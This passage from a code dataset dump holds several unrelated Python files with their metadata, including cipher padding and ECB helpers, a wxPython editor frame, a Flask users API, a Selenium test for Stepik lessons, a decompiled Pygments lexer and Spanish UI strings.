result","sub_path":"leetcode/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245775948","text":"from myutils import strxor\n\ndef pad_size(data_size, blocksize):\n    if data_size < blocksize:\n        return blocksize - data_size\n    if data_size % blocksize == 0:\n        return 0\n    return blocksize - data_size % blocksize\n\n\n# ISO/IEC 7816-4 style padding: a 0x80 marker byte followed by zero bytes\ndef pad2(data, blocksize):\n    return data + b\"\\x80\" + b\"\\x00\" * pad_size(len(data) + 1, blocksize)\n\n\ndef unpad2(data, blocksize):\n    last_block = bytearray(data[-blocksize:])\n    pad_index = last_block.rfind(b\"\\x80\")\n    if pad_index == -1:\n        raise ValueError(\"Invalid padding\")\n    for c in last_block[pad_index + 1:]:\n        if c != 0:\n            raise ValueError(\"Invalid padding\")\n    return data[:-(blocksize - pad_index)]\n\ndef ecb_encrypt(encrypter, bs, pt):\n    if not pt or len(pt) % bs != 0:\n        raise ValueError(\"Plaintext is not blocksize aligned\")\n    ct = []\n    for i in range(0, len(pt), bs):\n        ct.append(encrypter(pt[i:i + bs]))\n    return b\"\".join(ct)\n\n\ndef ecb_decrypt(decrypter, bs, ct):\n    if not ct or len(ct) % bs != 0:\n        raise ValueError(\"Ciphertext is not blocksize aligned\")\n    pt = []\n    for i in range(0, len(ct), bs):\n        pt.append(decrypter(ct[i:i + bs]))\n    return 
b\"\".join(pt)","sub_path":"ecdh_kuzn/kuznechik_modes.py","file_name":"kuznechik_modes.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290537411","text":"import wx\nimport wx.aui\nfrom .editor import TextEditor\n\nclass frame(wx.Frame):\n def __init__(self):\n super().__init__(None, title='Editor',size=(800,600))\n self.aui_manager = wx.aui.AuiManager(self,wx.aui.AUI_MGR_TRANSPARENT_HINT)\n self.editor_panel = TextEditor(self)\n\n self.aui_manager.AddPane(self.editor_panel, self._get_default_pane_info().CenterPane().Position(0).BestSize(400,-1))\n self.aui_manager.GetArtProvider().SetMetric(wx.aui.AUI_DOCKART_SASH_SIZE,0)\n self.aui_manager.Update()\n #self.Maximize(True)\n self._register_listeners()\n\n def _get_default_pane_info(self):\n return wx.aui.AuiPaneInfo().CaptionVisible(False).PaneBorder(False).CloseButton(False).PinButton(False).Gripper(\n False)\n\n def on_frame_closing(self, e):\n self.aui_manager.UnInit()\n del self.aui_manager\n self.Destroy()\n\n def _register_listeners(self):\n self.Bind(wx.EVT_CLOSE, self.on_frame_closing)","sub_path":"views/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326978095","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nuser_id = 0\nuser_list = []\n\n@app.route('/', methods=['GET'])\ndef hello():\n return \"Hello World!\"\n\n\n@app.route('/users', methods=['POST', 'GET'])\ndef add_user():\n user_id = len(user_list)\n name = request.form[\"name\"]\n new_user = {\"id\": user_id+1, \"name\": name}\n user_list.append(new_user)\n if request.method == 'POST':\n print(user_list[user_id])\n return jsonify(new_user), 201\n elif request.method == 'GET':\n return jsonify(new_user)\n else:\n return 404\n\n\n@app.route('/users/', methods=['GET', 'DELETE'])\ndef show_user(user_id):\n if request.method == 'GET':\n if user_id <= len(user_list):\n print(user_list[user_id-1])\n return jsonify(user_list[user_id-1])\n else:\n print(\"No user with this ID\")\n return \"User Not Found\",404\n elif request.method == 'DELETE':\n if user_id <= len(user_list):\n del user_list[user_id-1]\n return \"user deleted\",204\n else:\n return \"No such user\",400\n else:\n return \"Method not supported\"\n","sub_path":"quizzes/quizz2/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301030881","text":"#Copyright (C) 2015 DigiPen Institute of Technology.\n#Reproduction or disclosure of this file or its contents without\n#the prior written consent of DigiPen Institute of Technology is\n#prohibited.\n\nimport KeplerComposite\nimport random\nimport Directions\n\nMoveWaitGen = lambda : max(random.gauss(2.0, 0.5), 1.0)\n\nclass MinionLogicComponent:\n def Initialize(self):\n KeplerComposite.Connect(self.Space, 'LogicUpdate', self.Update)\n KeplerComposite.Connect(self.Owner, 'SharedCell', self.SharedCell)\n KeplerComposite.Connect(self.Owner, 'OutOfHealth', self.OnOutOfHealth)\n self.MoveTimer = 0\n self.MoveWait = MoveWaitGen()\n self.__light = None\n\n def Free(self):\n self.Space.MinionSpawner.MinionCount -= 1\n\n def OnOutOfHealth(self):\n self.Owner.Dispatch('MinionDied')\n\n def SharedCell(self, obj):\n if obj.HasComponent('PlayerLogic') and self.Owner.PlayerHealth.IsAlive:\n 
obj.Dispatch('DoDamage', 1)\n            self.Owner.Dispatch('DoDamage', 1)\n\n    def Update(self, dt):\n        self.MoveTimer += dt\n\n        self.Owner.Renderable.EmmisiveTint = self.Space.MinionSpawner.MinionGlow\n\n        while self.MoveTimer > self.MoveWait:\n            gridSpace = self.Space.GridSpace\n            directions = []\n\n            for name,offset in Directions.DirectionOffsets.items():\n\n                if gridSpace.CanMove(self.Owner, offset[0], offset[1]):\n                    p = self.Owner.Transform.Position + Directions.ToVec3(offset)\n                    objects = gridSpace.GetGridObjects(p.x, p.z)\n\n                    isMinion = False\n                    for obj in objects:\n                        if obj.HasComponent('MinionLogic'):\n                            isMinion = True\n                            break\n\n                    if not isMinion:\n                        directions.append(name)\n\n            if directions:\n                d = random.choice(directions)\n                self.Owner.Turn.Move(d)\n            self.MoveTimer -= self.MoveWait\n\n            self.MoveWait = MoveWaitGen()\n\n    @property\n    def Light(self):\n        return self.__light\n\n    @Light.setter\n    def Light(self, value):\n        self.__light = value\n\n\nKeplerComposite.RegisterComponent(MinionLogicComponent, 'MinionLogic')\n","sub_path":"Kepler/Scale/Content/Components/MinionLogicComponent.py","file_name":"MinionLogicComponent.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"32573801","text":"import requests,json,re,sys\r\n#---------------------------------\r\n\r\n#Initialising Dictionary\r\nD_invest = {} #Dictionary which will contain Investor:[List of Companies He/She Invested In]\r\nD_value = {} #Dictionary which will contain Company:Valuation By Investor\r\nD_avg = {} #Dictionary which will contain Investor:Total Amount Invested\r\ndef extractInfo(url):\r\n    if(len(url)>0):\r\n        #----------------------------\r\n        #Getting JSON Data From URL Using Requests Module\r\n        try:\r\n            r = requests.get('https://gist.githubusercontent.com/murtuzakz/4bd887712703ff14c9b0f7c18229b332/raw/d0dd1c59016e2488dcbe0c8e710a1c5df9c3672e/season7.json')\r\n        except requests.exceptions.RequestException as e:\r\n            print(\"Oops! Kindly Check your Internet Connection\")\r\n            sys.exit(1)\r\n        else:\r\n            data = json.loads(r.text)#Loading JSON Data\r\n\r\n        #-------------------------------\r\n        #Regular Expression Used For Searching Particular Pattern Or Extracting Out Particular String\r\n        investor = re.compile(\"investors\")\r\n        name = re.compile(\"Kevin\")\r\n        thousand = re.compile(\"\\$((\\d+\\.\\d+)|(\\d+))K\")\r\n        million = re.compile(\"\\$((\\d+\\.\\d+)|(\\d+))M\")\r\n        percentage = re.compile(\"((\\d+)|(\\d+\\.\\d+))%\")\r\n        unicode = re.compile(\"\\\\xa0\")\r\n        #---------------------------------\r\n        #Analysing JSON Data as Dictionary\r\n        for key,val in data.items():\r\n            L = data[key] #Getting a value of every key which denotes episode as List\r\n            #-------------------------------------------\r\n            #Now we have lists regarding one episode, each containing all info as a dictionary \r\n            for j in range(len(L)):\r\n                for k,v in L[j].items():#Going one by one through attributes of Dictionary\r\n                    match = investor.search(k)#Finding a key investors\r\n                    if(match):\r\n                        if v:#Accepting those investors who funded\r\n                            li = []#List of names of investors\r\n                            temp = v.find(\"and\")#Case where name contains \"and\"; just separating them\r\n                            if(temp > 0):\r\n                                l = v.replace(\"and\",\",\")\r\n                                li = l.split(',')\r\n                                li[0]=li[0].replace('\\n','')\r\n                                li[1]=li[1].replace('\\n','')\r\n                            else:\r\n                                li = v.split(\",\")\r\n                            for i in li:\r\n                                if (len(i)>1):\r\n                                    match = name.search(i)\r\n                                    if(match):\r\n                                        lt = i.strip(' ').split(' ')\r\n                                        if (len(lt)>2):\r\n                                            i = lt[0]+\" \"+ lt[1]+lt[2]\r\n                                        else:\r\n                                            i = lt[0]+\" \" +lt[1]\r\n                                    inv_name = i.strip(' ')\r\n                                    D_invest[inv_name]=D_invest.setdefault(inv_name,[])#Creating new key(name of investor) with empty list of companies\r\n                                    comp_name = L[j]['company']['title']#Taking out Company Name\r\n                                    match = unicode.search(comp_name)#Taking care of some unicode character '\\xa0'\r\n                                    if(match):\r\n                                        encoded_str = comp_name.encode('ascii','ignore')#First encoding into bytes\r\n                                        decoded_str = encoded_str.decode('utf-8')#Decoding the bytes\r\n                                        comp_name = decoded_str\r\n                                        D_invest[inv_name].append(comp_name)\r\n                                    else:\r\n                                        D_invest[inv_name].append(comp_name)\r\n                                    D_value[comp_name]=D_value.setdefault(comp_name,1)#Creating new key(name of company) with value(valuation amount)\r\n                                    inv_amount = L[j]['kitna']\r\n                                    m = inv_amount.split('for')#Splitting the investment amount string\r\n                                    match = thousand.search(m[0])\r\n                                    if(match):\r\n                                        invest_amount = float(match.group(1))*1000#For investment in K\r\n                                    match = million.search(m[0])\r\n                                    if(match):\r\n                                        invest_amount = float(match.group(1))*1000000#For investment in M\r\n                                    match = percentage.search(m[1])\r\n                                    if(match):\r\n                                        percent = float(match.group(1))#For Percentage\r\n                                    final_value = (invest_amount/percent)*100 #Calculating Valuation By Investor of company\r\n                                    D_value[comp_name]=round(final_value)\r\n                                    D_avg[inv_name] = D_avg.setdefault(inv_name,1)#Creating new key(name of investor) with value(Invested Amount)\r\n                                    D_avg[inv_name] += invest_amount\r\n    else:\r\n        print(\"Empty String Given\")\r\n\r\n\r\n# Getting a list of all investors, sorted by the number of companies they invested in\r\n\r\ndef invComp():\r\n    print(\"A list of all the investors that invested, along with the companies they invested in, sorted by the investor with the maximum number of investments\")\r\n    print(\"---------------------------------------------------------------------------------------------------\")\r\n    ranked = sorted(D_invest.items(),key=lambda e:len(e[1]),reverse=True)#Sorting Based On Number Of Companies\r\n    for i in range(len(ranked)):\r\n        print(\"\\n{} : {}\".format(ranked[i][0],ranked[i][1]))#Printing As Per Given Format\r\n\r\n#Representing the list of companies with their predicted full current value\r\n \r\ndef compValue():\r\n    print(\"\\nValuation of the company by the Investor\")\r\n    print(\"--------------------------------------------------------------------------------------------------\")\r\n    ranked = sorted(D_value.items(),key=lambda e:e[1],reverse=True)\r\n    for i in range(len(ranked)):\r\n        print(\"\\n{} : ${}\".format(ranked[i][0],ranked[i][1]))\r\n#Representing Total Amount And Average Amount Invested By an Investor\r\n\r\ndef invAvg():\r\n    print(\"\\nTotal Amount and Average Amount Invested By an Investor\")\r\n    print(\"--------------------------------------------------------------------------------------------------\")\r\n    ranked = sorted(D_avg.items(),key=lambda e:e[1],reverse=True)\r\n    for i in range(len(ranked)):\r\n        print(\"\\n{} : Total Investment ${} : average investment ${:.2f}\".format(ranked[i][0],ranked[i][1],ranked[i][1]/len(D_invest[ranked[i][0]])))\r\n\r\n#-----------------------------------------------\r\n#Main Function\r\nextractInfo('https://gist.githubusercontent.com/murtuzakz/4bd887712703ff14c9b0f7c18229b332/raw/d0dd1c59016e2488dcbe0c8e710a1c5df9c3672e/season7.json')\r\ninvComp()\r\ncompValue()\r\ninvAvg()\r\n\r\n \r\n\r\n \r\n","sub_path":"anuragkrsingh.py","file_name":"anuragkrsingh.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"478343729","text":"import time\nimport math\nimport unittest\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nanswer = math.log(int(time.time()))\nprint(answer)\n\n\n@pytest.fixture(scope=\"function\")\ndef browser():\n    print(\"\\nstart browser for test..\")\n    browser = webdriver.Chrome()\n    yield browser\n    print(\"\\nquit browser..\")\n    browser.quit()\n\n    # class TestMainPage1():\n\n\nCT = ''\nlst_addr = ['https://stepik.org/lesson/236895/step/1',\n            'https://stepik.org/lesson/236896/step/1',\n            'https://stepik.org/lesson/236897/step/1',\n            'https://stepik.org/lesson/236898/step/1',\n            'https://stepik.org/lesson/236899/step/1',\n            'https://stepik.org/lesson/236903/step/1',\n            'https://stepik.org/lesson/236904/step/1',\n            'https://stepik.org/lesson/236905/step/1']\n\n\n@pytest.mark.parametrize('lst_addr', lst_addr)\ndef test_guest_should_see_login_link(browser, lst_addr, CT=''):\n    link = f'{lst_addr}'\n    browser.get(link)\n    browser.implicitly_wait(10)\n    browser.find_element_by_css_selector \\\n        ('[placeholder=\"Напишите ваш ответ здесь...\"]'). \\\n        send_keys(str(math.log(int(time.time()))))\n    # browser.find_element_by_class_name('submit-submission').\\\n    #     click()\n    WebDriverWait(browser, 6) \\\n        .until(EC.element_to_be_clickable\n               ((By.CLASS_NAME, 'submit-submission'))) \\\n        .click()\n    # time.sleep(1)\n\n    el_answer_text = WebDriverWait(browser, 5). \\\n        until(EC.visibility_of_element_located\n              ((By.CLASS_NAME, \"smart-hints__hint\"))).text\n    # class =\"smart-hints__hint\"\n    print(el_answer_text)\n\n    if el_answer_text != 'Correct!':\n        CT += el_answer_text\n    else:\n        pass\n\n    # print(composite_text)\n    assert el_answer_text == 'Correct!'\n\n\nprint(CT)\n\n# if __name__ == '__main__':\n#     unittest.main()\n","sub_path":"less_3/pytestes_param/test_param_dz_1.py","file_name":"test_param_dz_1.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"465412545","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-build-ed191__6/Pygments/pygments/lexers/data.py\n# Compiled at: 2020-01-10 16:25:35\n# Size of source mod 2**32: 19056 bytes\n\"\"\"\n    pygments.lexers.data\n    ~~~~~~~~~~~~~~~~~~~~\n\n    Lexers for data file format.\n\n    :copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.\n    :license: BSD, see LICENSE for details.\n\"\"\"\nimport re\nfrom pygments.lexer import RegexLexer, ExtendedRegexLexer, LexerContext, include, bygroups, inherit\nfrom pygments.token import Text, Comment, Keyword, Name, String, Number, 
Punctuation, Literal, Error\n__all__ = [\n 'YamlLexer', 'JsonLexer', 'JsonBareObjectLexer', 'JsonLdLexer']\n\nclass YamlLexerContext(LexerContext):\n __doc__ = 'Indentation context for the YAML lexer.'\n\n def __init__(self, *args, **kwds):\n (super(YamlLexerContext, self).__init__)(*args, **kwds)\n self.indent_stack = []\n self.indent = -1\n self.next_indent = 0\n self.block_scalar_indent = None\n\n\nclass YamlLexer(ExtendedRegexLexer):\n __doc__ = '\\n Lexer for `YAML `_, a human-friendly data serialization\\n language.\\n\\n .. versionadded:: 0.11\\n '\n name = 'YAML'\n aliases = ['yaml']\n filenames = ['*.yaml', '*.yml']\n mimetypes = ['text/x-yaml']\n\n def something(token_class):\n \"\"\"Do not produce empty tokens.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if not text:\n return\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def reset_indent(token_class):\n \"\"\"Reset the indentation levels.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n context.indent_stack = []\n context.indent = -1\n context.next_indent = 0\n context.block_scalar_indent = None\n yield (match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def save_indent(token_class, start=False):\n \"\"\"Save a possible indentation level.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n extra = ''\n if start:\n context.next_indent = len(text)\n if context.next_indent < context.indent:\n while context.next_indent < context.indent:\n context.indent = context.indent_stack.pop()\n\n if context.next_indent > context.indent:\n extra = text[context.indent:]\n text = text[:context.indent]\n else:\n context.next_indent += len(text)\n if text:\n yield (\n match.start(), token_class, text)\n if extra:\n yield (\n match.start() + len(text), token_class.Error, extra)\n context.pos = match.end()\n\n return callback\n\n def set_indent(token_class, implicit=False):\n \"\"\"Set the previously saved indentation level.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.indent < context.next_indent:\n context.indent_stack.append(context.indent)\n context.indent = context.next_indent\n if not implicit:\n context.next_indent += len(text)\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def set_block_scalar_indent(token_class):\n \"\"\"Set an explicit indentation level for a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n context.block_scalar_indent = None\n if not text:\n return\n increment = match.group(1)\n if increment:\n current_indent = max(context.indent, 0)\n increment = int(increment)\n context.block_scalar_indent = current_indent + increment\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def parse_block_scalar_empty_line(indent_token_class, content_token_class):\n \"\"\"Process an empty line in a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.block_scalar_indent is None or len(text) <= context.block_scalar_indent:\n if text:\n yield (\n match.start(), indent_token_class, text)\n else:\n indentation = text[:context.block_scalar_indent]\n content = text[context.block_scalar_indent:]\n yield (match.start(), indent_token_class, indentation)\n yield (match.start() + context.block_scalar_indent,\n content_token_class, content)\n context.pos = match.end()\n\n 
return callback\n\n def parse_block_scalar_indent(token_class):\n \"\"\"Process indentation spaces in a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.block_scalar_indent is None:\n if len(text) <= max(context.indent, 0):\n context.stack.pop()\n context.stack.pop()\n return\n context.block_scalar_indent = len(text)\n else:\n if len(text) < context.block_scalar_indent:\n context.stack.pop()\n context.stack.pop()\n return\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def parse_plain_scalar_indent(token_class):\n \"\"\"Process indentation spaces in a plain scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if len(text) <= context.indent:\n context.stack.pop()\n context.stack.pop()\n return\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n tokens = {'root':[\n (\n '[ ]+(?=#|$)', Text),\n (\n '\\\\n+', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '^%YAML(?=[ ]|$)', reset_indent(Name.Tag), 'yaml-directive'),\n (\n '^%TAG(?=[ ]|$)', reset_indent(Name.Tag), 'tag-directive'),\n (\n '^(?:---|\\\\.\\\\.\\\\.)(?=[ ]|$)', reset_indent(Name.Namespace),\n 'block-line'),\n (\n '[ ]*(?!\\\\s|$)', save_indent(Text, start=True),\n ('block-line', 'indentation'))], \n 'ignored-line':[\n (\n '[ ]+(?=#|$)', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '\\\\n', Text, '#pop:2')], \n 'yaml-directive':[\n (\n '([ ]+)([0-9]+\\\\.[0-9]+)',\n bygroups(Text, Number), 'ignored-line')], \n 'tag-directive':[\n (\n \"([ ]+)(!|![\\\\w-]*!)([ ]+)(!|!?[\\\\w;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]+)\",\n bygroups(Text, Keyword.Type, Text, Keyword.Type),\n 'ignored-line')], \n 'indentation':[\n (\n '[ ]*$', something(Text), '#pop:2'),\n (\n '[ ]+(?=[?:-](?:[ ]|$))', save_indent(Text)),\n (\n '[?:-](?=[ ]|$)', set_indent(Punctuation.Indicator)),\n (\n '[ ]*', save_indent(Text), '#pop')], \n 'block-line':[\n (\n '[ ]*(?=#|$)', something(Text), '#pop'),\n (\n '[ ]+', Text),\n (\n '([^#,:?\\\\[\\\\]{}\"\\'\\\\n]+)(:)(?=[ ]|$)',\n bygroups(Name.Tag, set_indent(Punctuation, implicit=True))),\n include('descriptors'),\n include('block-nodes'),\n include('flow-nodes'),\n (\n '(?=[^\\\\s?:,\\\\[\\\\]{}#&*!|>\\\\\\'\"%@`-]|[?:-]\\\\S)',\n something(Name.Variable),\n 'plain-scalar-in-block-context')], \n 'descriptors':[\n (\n \"!<[\\\\w#;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]+>\", Keyword.Type),\n (\n \"!(?:[\\\\w-]+!)?[\\\\w#;/?:@&=+$,.!~*\\\\'()\\\\[\\\\]%-]*\",\n Keyword.Type),\n (\n '&[\\\\w-]+', Name.Label),\n (\n '\\\\*[\\\\w-]+', Name.Variable)], \n 'block-nodes':[\n (\n ':(?=[ ]|$)', set_indent((Punctuation.Indicator), implicit=True)),\n (\n '[|>]', Punctuation.Indicator,\n ('block-scalar-content', 'block-scalar-header'))], \n 'flow-nodes':[\n (\n '\\\\[', Punctuation.Indicator, 'flow-sequence'),\n (\n '\\\\{', Punctuation.Indicator, 'flow-mapping'),\n (\n \"\\\\'\", String, 'single-quoted-scalar'),\n (\n '\\\\\"', String, 'double-quoted-scalar')], \n 'flow-collection':[\n (\n '[ ]+', Text),\n (\n '\\\\n+', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '[?:,]', Punctuation.Indicator),\n include('descriptors'),\n include('flow-nodes'),\n (\n '(?=[^\\\\s?:,\\\\[\\\\]{}#&*!|>\\\\\\'\"%@`])',\n something(Name.Variable),\n 'plain-scalar-in-flow-context')], \n 'flow-sequence':[\n include('flow-collection'),\n (\n '\\\\]', Punctuation.Indicator, '#pop')], \n 'flow-mapping':[\n (\n '([^,:?\\\\[\\\\]{}\"\\'\\\\n]+)(:)(?=[ ]|$)',\n 
bygroups(Name.Tag, Punctuation)),\n include('flow-collection'),\n (\n '\\\\}', Punctuation.Indicator, '#pop')], \n 'block-scalar-content':[\n (\n '\\\\n', Text),\n (\n '^[ ]+$',\n parse_block_scalar_empty_line(Text, Name.Constant)),\n (\n '^[ ]*', parse_block_scalar_indent(Text)),\n (\n '[\\\\S\\\\t ]+', Name.Constant)], \n 'block-scalar-header':[\n (\n '([1-9])?[+-]?(?=[ ]|$)',\n set_block_scalar_indent(Punctuation.Indicator),\n 'ignored-line'),\n (\n '[+-]?([1-9])?(?=[ ]|$)',\n set_block_scalar_indent(Punctuation.Indicator),\n 'ignored-line')], \n 'quoted-scalar-whitespaces':[\n (\n '^[ ]+', Text),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '[ ]+', Name.Variable)], \n 'single-quoted-scalar':[\n include('quoted-scalar-whitespaces'),\n (\n \"\\\\'\\\\'\", String.Escape),\n (\n \"[^\\\\s\\\\']+\", String),\n (\n \"\\\\'\", String, '#pop')], \n 'double-quoted-scalar':[\n include('quoted-scalar-whitespaces'),\n (\n '\\\\\\\\[0abt\\\\tn\\\\nvfre \"\\\\\\\\N_LP]', String),\n (\n '\\\\\\\\(?:x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})',\n String.Escape),\n (\n '[^\\\\s\"\\\\\\\\]+', String),\n (\n '\"', String, '#pop')], \n 'plain-scalar-in-block-context-new-line':[\n (\n '^[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '^(?=---|\\\\.\\\\.\\\\.)', something(Name.Namespace), '#pop:3'),\n (\n '^[ ]*', parse_plain_scalar_indent(Text), '#pop')], \n 'plain-scalar-in-block-context':[\n (\n '[ ]*(?=:[ ]|:$)', something(Text), '#pop'),\n (\n '[ ]+(?=#)', Text, '#pop'),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text, 'plain-scalar-in-block-context-new-line'),\n (\n '[ ]+', Literal.Scalar.Plain),\n (\n '(?::(?!\\\\s)|[^\\\\s:])+', Literal.Scalar.Plain)], \n 'plain-scalar-in-flow-context':[\n (\n '[ ]*(?=[,:?\\\\[\\\\]{}])', something(Text), '#pop'),\n (\n '[ ]+(?=#)', Text, '#pop'),\n (\n '^[ ]+', Text),\n (\n '[ ]+$', Text),\n (\n '\\\\n+', Text),\n (\n '[ ]+', Name.Variable),\n (\n '[^\\\\s,:?\\\\[\\\\]{}]+', Name.Variable)]}\n\n def get_tokens_unprocessed(self, text=None, context=None):\n if context is None:\n context = YamlLexerContext(text, 0)\n return super(YamlLexer, self).get_tokens_unprocessed(text, context)\n\n\nclass JsonLexer(RegexLexer):\n __doc__ = '\\n For JSON data structures.\\n\\n .. versionadded:: 1.5\\n '\n name = 'JSON'\n aliases = ['json']\n filenames = ['*.json']\n mimetypes = ['application/json']\n flags = re.DOTALL\n int_part = '-?(0|[1-9]\\\\d*)'\n frac_part = '\\\\.\\\\d+'\n exp_part = '[eE](\\\\+|-)?\\\\d+'\n tokens = {'whitespace':[\n (\n '\\\\s+', Text)], \n 'simplevalue':[\n (\n '(true|false|null)\\\\b', Keyword.Constant),\n (\n '%(int_part)s(%(frac_part)s%(exp_part)s|%(exp_part)s|%(frac_part)s)' % vars(),\n Number.Float),\n (\n int_part, Number.Integer),\n (\n '\"(\\\\\\\\\\\\\\\\|\\\\\\\\\"|[^\"])*\"', String.Double)], \n 'objectattribute':[\n include('value'),\n (\n ':', Punctuation),\n (\n ',', Punctuation, '#pop'),\n (\n '\\\\}', Punctuation, '#pop:2')], \n 'objectvalue':[\n include('whitespace'),\n (\n '\"(\\\\\\\\\\\\\\\\|\\\\\\\\\"|[^\"])*\"', Name.Tag, 'objectattribute'),\n (\n '\\\\}', Punctuation, '#pop')], \n 'arrayvalue':[\n include('whitespace'),\n include('value'),\n (\n ',', Punctuation),\n (\n '\\\\]', Punctuation, '#pop')], \n 'value':[\n include('whitespace'),\n include('simplevalue'),\n (\n '\\\\{', Punctuation, 'objectvalue'),\n (\n '\\\\[', Punctuation, 'arrayvalue')], \n 'root':[\n include('value')]}\n\n\nclass JsonBareObjectLexer(JsonLexer):\n __doc__ = '\\n For JSON data structures (with missing object curly braces).\\n\\n .. 
versionadded:: 2.2\\n '\n name = 'JSONBareObject'\n aliases = ['json-object']\n filenames = []\n mimetypes = ['application/json-object']\n tokens = {'root':[\n (\n '\\\\}', Error),\n include('objectvalue')], \n 'objectattribute':[\n (\n '\\\\}', Error),\n inherit]}\n\n\nclass JsonLdLexer(JsonLexer):\n __doc__ = '\\n For `JSON-LD `_ linked data.\\n\\n .. versionadded:: 2.0\\n '\n name = 'JSON-LD'\n aliases = ['jsonld', 'json-ld']\n filenames = ['*.jsonld']\n mimetypes = ['application/ld+json']\n tokens = {'objectvalue': [\n (\n '\"@(context|id|value|language|type|container|list|set|reverse|index|base|vocab|graph)\"',\n Name.Decorator,\n 'objectattribute'),\n inherit]}","sub_path":"pycfiles/libopenstorage_openstorage-0.42.24.1-py3-none-any/data.cpython-36.py","file_name":"data.cpython-36.py","file_ext":"py","file_size_in_byte":14298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9648595","text":"# -*- coding: utf-8 -*-\n# spanish literals\n\nMENU = u'Menu'\n\nRADIO = u'Web Radio'\nFM = u'FM Radio'\nBLUETOOTH = u'Bluetooth'\nOPTIONS = u'Opciones'\n\nFAVORITES = u'favoritos'\nRECENT = u'reciente'\nTAGS = u'etiquetas'\nCOUNTRIES = u'paises'\nLANGUAGES = u'idiomas'\nEMPTY = u'vacio'\nSEARCH = u'buscar'\n\nPLAY = u'reproducir'\nADD_FAVORITES = u'añadir a favoritos'\nMORE_INFO = u'mas información'\nREMOVE_FAVORITES = u'quitar de favoritos'\n\nKEYBOARD0 = [['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', '<'],\n ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', u'▼', u'◄'],\n ['^', 'z', 'x', 'c', u'═══', 'v', 'b', 'n', u'ñ', 'm']]\n\nKEYBOARD1 = [['Q', 'W', 'E', 'R', 'T', 'Y', 'U', 'I', 'O', 'P', '<'],\n ['A', 'S', 'D', 'F', 'G', 'H', 'J', 'K', 'L', u'▼', u'◄'],\n ['^', 'Z', 'X', 'C', u'═══', 'V', 'B', 'N', u'Ñ', 'M']]\n\nKEYBOARD2 = [['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '<'],\n [u'@', u'€', u'_', u'&', u'-', u'+', u'(', u')', u'/', u'▼', u'◄'],\n ['^', '*', '\"', \"'\", u'═══', ':', ';', '!', '?']]\n\nKEYBOARDS = [KEYBOARD0, KEYBOARD1, KEYBOARD2]\n\nWIFI = u'wifi'\nSSID = u'ssid'\nPASSWORD = u'contraseña'\nREMOVE = u'olvidar'\nCHECK = u'comprobar'\nUPDATE = u'actualizar'\n\nSTATION = u'estación'\nTITLE = u'título'\nTIME = u'tiempo'\nAUDIO = u'audio'\nBITRATE = u'bitrate'\n\nNAME = u'nombre'\nCOUNTRY = u'país'\nSUBCOUNTRY = u'subpais'\nHOMEPAGE = u'página web'\nURL = u'url'\nLANGUAGE = u'idiomas'","sub_path":"i18n/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571297316","text":"# -*- coding: utf-8 -*-\nfrom mongoengine import *\n\nfrom flask.ext.mongoengine.wtf import model_form\nfrom datetime import datetime\n\n\nclass Comment(EmbeddedDocument):\n\tname = StringField()\n\tcomment = StringField()\n\ttimestamp = DateTimeField(default=datetime.now())\n\nclass 